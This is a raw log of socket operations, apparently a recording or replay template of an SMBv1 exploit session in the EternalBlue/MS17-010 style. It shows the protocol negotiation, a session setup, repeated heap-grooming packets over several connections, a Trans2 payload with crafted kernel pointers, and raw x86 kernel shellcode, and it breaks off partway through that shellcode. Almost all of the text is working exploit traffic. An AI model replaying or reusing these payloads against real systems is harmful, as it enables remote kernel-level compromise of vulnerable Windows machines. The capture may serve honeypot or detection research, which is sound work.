b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 16, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('send', 16, b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00,\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf8\\\\x87\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('close', 2, 0.0)\", \"('connect', 17, 0.0)\", \"('send', 17, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 18, 0.0)\", \"('connect', 19, 0.0)\", \"('send', 18, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 20, 0.0)\", \"('send', 19, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 21, 0.0)\", \"('send', 20, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 21, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('close', 16, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x001\\\\xffSMB+\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x01\\\\x01\\\\x00\\\\x0c\\\\x00JlJmIhClBsr\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xf3\\\\x00\\\\x00\\\\x00\\\\x10j2we/eOEgsdJaALstzzVll0rPXIF501SIOmrcFEJh8lIEf8pW1daYqgEMXZ/1BpUzwMWD5jXvWQa+axhtIilVnEC1OwTGy3wi/r9LcDedgTXOnANzcYcUctIQTk1i2YSbSbAXQGfcsOz8WuTaRM6izqBTyXIK9tN11KVs795Y4BbKeIypCrVHOUY6Y2OtaHS9GhqoGojWs39jjKb9sPkWulrHwPEUl9A42NyUza+S6awW/ySODRkWkTKYS2zyEAso0k4KR4hl2KvJFDnwX157Hp1rsfwS2BCFjByigWVbdT5GMi0HaSukFUskn3ghnVP1G9fWhI7XzVi4XXu+uzDfYNainzFux7CUA33IhPTet1KPoVrQZYwzyjpv52sBPWG4RSCKDYRR+QUo0Pte8/0ix4PGf/VFzxDB+C3pHP2HGNsNX9zT9FJZLgOld40WLdof0IsgNeTLUVyy+o0FL/xp1+J0UQgpb71qWilo8RDEZqcFle9+FdGTlnR4ZcbgG7j1Td/YltwmCAZsTFbCQwmDls8KmZlvzaz4qOOLTuVAyX2e6HKfuPQmzs8X6rGnDTqtFvEELPjWtEQsxs8d1krRZO3FYFUUTeWphjMefQjj745faY6AHmnLK8sir5aG7B6v6OsqHGZ/UXDTPDCCbIBdz2ohdHbKAMH0rka/vVZXeQ8AdSwIOK8j792KDUQFq2BoEEHoOLmwCCg4D0Sbuyh+CcSDYyRiwsczJQE4XaI5LAsPBqpZhKnk6hvi+BYFJQPY3EErRBlIh1MFL7KnW3hroMlMUOaICr+hANsZvjgdN2HTldlqqwzUppld56Mjpy0lLCHljvKmjZyJhfgIwzlgk+wd4qQQGh1XAAV9d0Q5nTA9nWn8x5epjMix1c2jLx+Vdsz3DmzJ5hH32kHEdrxs3iIypHAdC4LXlzG8oKa1+XeHsGFyHSD1qFewdGpRdw4ilEHJHTT9XAKTFOzlP3iM8c9VJXAo96k4GU1EYMobVLqnC9zLwG2+eKzZsgPNE1gtMuXPnM2lOhFzai4FY2YFzQVT2ria1Uza4FKWrOniTXcWRUWKMyhmglP4S1yOtRjD9LEPTOhOeF85DFOtJPRVbIPl8QOjm2IE1rwQt4AbVR2o6YK5pUGXNLCZxXroI8l+mQX3gudA56Bcb/I7hfyeWZy5zaWa5BRrI1Ss+7D3v9knvDj8unV3n9SFY4n/tSxMhRPAF5WlNnTyXmwiWu37r8oWJHCv737uO8horQjTprukSyUEhfRPTnFAkNas3f2Dkf4scXeay8Xl0m5BBeCF2Uum25+98WKvjt988Fllxah/9ENvZyO0XLAJ2RFRcdZhEsXvJP+6RvXTR+zTStn+833TmvQZogXeY5NK9mXw8epopDiwcnR1b0KYlW2BgHDYu9M1ROg1FmsTm7jJg08idOnT97CVvLvCD/iGEit/o9ILECFLJh6nPHZIx2QTlMTWmT6m8SCDdvkCZGSmkmhyQYEMwgW+SxQG/WJxk5S87hAxZ8pFBkdbdYbv0TuM6N01xux/A88GDW7Ec/0sLDWM4j+rdKEcoKd+QdV/4XGxkr8Bm05FWwhAldsSsVjl6Hs2Fl645VswUWp1/F4phKmIc9K13XOR72bBoPtfm5SDEdhFZAEBbExSawLmCttNAnepuAcs6NXbNf9KMQN7OEmD/4TUy5qtNKk38o6eSycRpKon+V/9a7Z0MuCtAGKlNqWaQJ2kE/DayT0jUYpZjOriWrBDO1JvPSDeT8KUz69GgaefkUK/MKbqU9uzQ58e+PhJn5syo8cfmvr/WcWU01xKPJPv7qV633aOw4KdBNSKhHZHU3UMMjl7iGfmmZ0abo8Ku7cF5Po1seA7eb829Z/c4QyOKOCVexDQfVv0R7WSfX1FAGB1aCAU+usoxBVIHcdOYx2CW8cWiQf/JsigH08HmBl4n+yl93wgyAnKBBUSUz5mPSTMEVA2LbNj5s7WWgVqxbd/IlGz9VeRTMeJtSZVBihCnEjmBuIpBDe/kPpjWohNu/+fMLe0o77UmvP6fFj5PGLQVZbBLAT43E5Z/1CUEn8U5JKDzvCN0ErOvj2OKMaVG8DHaDKv76iEx0bUchORFfgVVbzIgLopHEBrRQ2nfnHYHMEMIF1mYp6t8ERWM8qG6GN+lihN8u1rA70NJMtcGPm/Y9JU5m8+N9havGpr+oJbNbLH23690Jgz48ANbhi/sb7jMRAnPdGj88jskgbZiQU1cV7pvTwNFUDNKDy7JglOw2cTe57K5krfjKuNe/GuF3P+RlP8P+nePLQopg+D4QJIIw8kKc0KO/emVJeDdX5v9NSny+xya10d1VLvaqWTlfbuiBsqUHM3yy0oS1IGFfcHsE+d5PaaxRm/3polguoVhY/i2hHsskV+kUAukZGRq5r3ATX9aJxAzq/TgBhiCBjEUWKZ3cE5u2P9+4dR3jfU23tlCz/tCU8hgjapCOWZv9fexHIRiyk6zayNSHAh2iVimiE0iOxS/OuRpbpunWetUNUi99Qdn/77VgXoArmoKDc76T3E+7ZhAfuDwN3OlSK91LZOK6dIwkKmnGRK3X4xV2yO5aKv+9CVnoun6MC4OSmdKQrtN4zZnAShPGa3yLpqS3VvaD+W5IRkA9dhgJi1NlYPDhKQB2pr7GgprbLruE8xtGkqWGFtDoqzIXeXU3XV6NOsK7TlcHbBf5Al7hQA8QCIbE5g4ZfwyOEVURorlqBIt+8ILoXLDHd4XF8D8MOtDq2xGmU1IAd1PgxNHG+92GH8TnERYGX9VnUZtXsc5UYavH/ofc195afb6eDIyQMoe9TRTwtMqt/4hUf9WsgchDdcnuMO3cuT3t6WIJuf79GwRxwtyuK2VBk7hHuMISw3Q1l91m+JC21q3acLy+Sb+DXiK7216urYRdKw6rGC+Z9kGQ7zap088YFppnl+VxWphqZck/WQ\\\\x80\\\\x00\\\\xa8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00 \\\\xf0\\\\xdf\\\\xff\\\\x00\\\\xf1\\\\xdf\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff`\\\\x00\\\\x04\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\xef\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x18\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00`\\\\x00\\\\x04\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xff\\\\xcf\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x009\\\\xbbfd4d9L7LS8S9B/wrEIUITZWAQeOPEtmB9vuq8KgrAP3loQnkmQdvP0QF9j8CIF9EdmNK3KEnH2CBme0Xxbx/WOOCBCDPvvjJYvcvf95egcjZ+dWquiACPOkTFW3JS6M+sLa/pa6uVzjjWOIeBX+V3Pu12C9PjUWOoRfFOAX+SFzVJL4ugpzxsVRvgFvIgqXupq+y6bfWsK90pWeE5qzBSTKcSepm0GPGr/rJg0hJn4aVBbsdnXxM2ZCDorVUsFUsF9vXC2UIJlsx5yEdThqQ5MoEd6tRwRSfYA87dvMJrPfpB8qLIaFHNX684tJJn30Bx0vnkLW3oRcGKuBqZdJ/PI4yIm++QVKkBLVa106S2gpwejplTs510cW0VN+8yVJAuZhPZSij7FLlAE4zS0bjSo6lP098nSduB9h9eziOeLhd1KG16h+g8xP2CV1VsNhr9ao+2cmCeiHYhbceDilST+ASGztHMWarFIlJUL6qlCrptzEJTk+er2j7SfHHT0nNtEa4+JRvPq5C21Kd1pcQ7vKlvZ5flQs1vvXTGZhYZKTv5lrdWNEtVEzGh+KvTFJxqKz5LNvLPT/0yRqcO6deL/nmv3UCt+B0Ut2X6cNonJG76Ut78wcRv4YP2MwApDS9fSz2AGGVxm246qiUiKWWtM6w40aDjuPH7gCQEoDHwhJgvLgmSaibPwjJrDzO0hMGDrp6SxwIFNS1G2oAPcvOn4CL4JDuLCBs08NtDrQysl0WMgCIBM+1O5D8Lue0J0359/4fCzqNCvBoqgyss9YWZb6wy6C/Kz4ak/Qmt74uXsA71fduIs3zEs6CAPpQQlvXMlZYWczpenAS2b+gO6aHHEFZBJmJ6Vy9I4RoLIPH/8Ig1ManJzkgPODvGvcuE/WUDFmiIiwGMlFMFTchBTVUQSPaLFWMUk6FqeO1LTY2/Rc3lSWSuBVeAAtlUNa6kfXqh/9==', 0.0)\", \"('recv', 1, 0.0)\", '(\\'send\\', 3, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\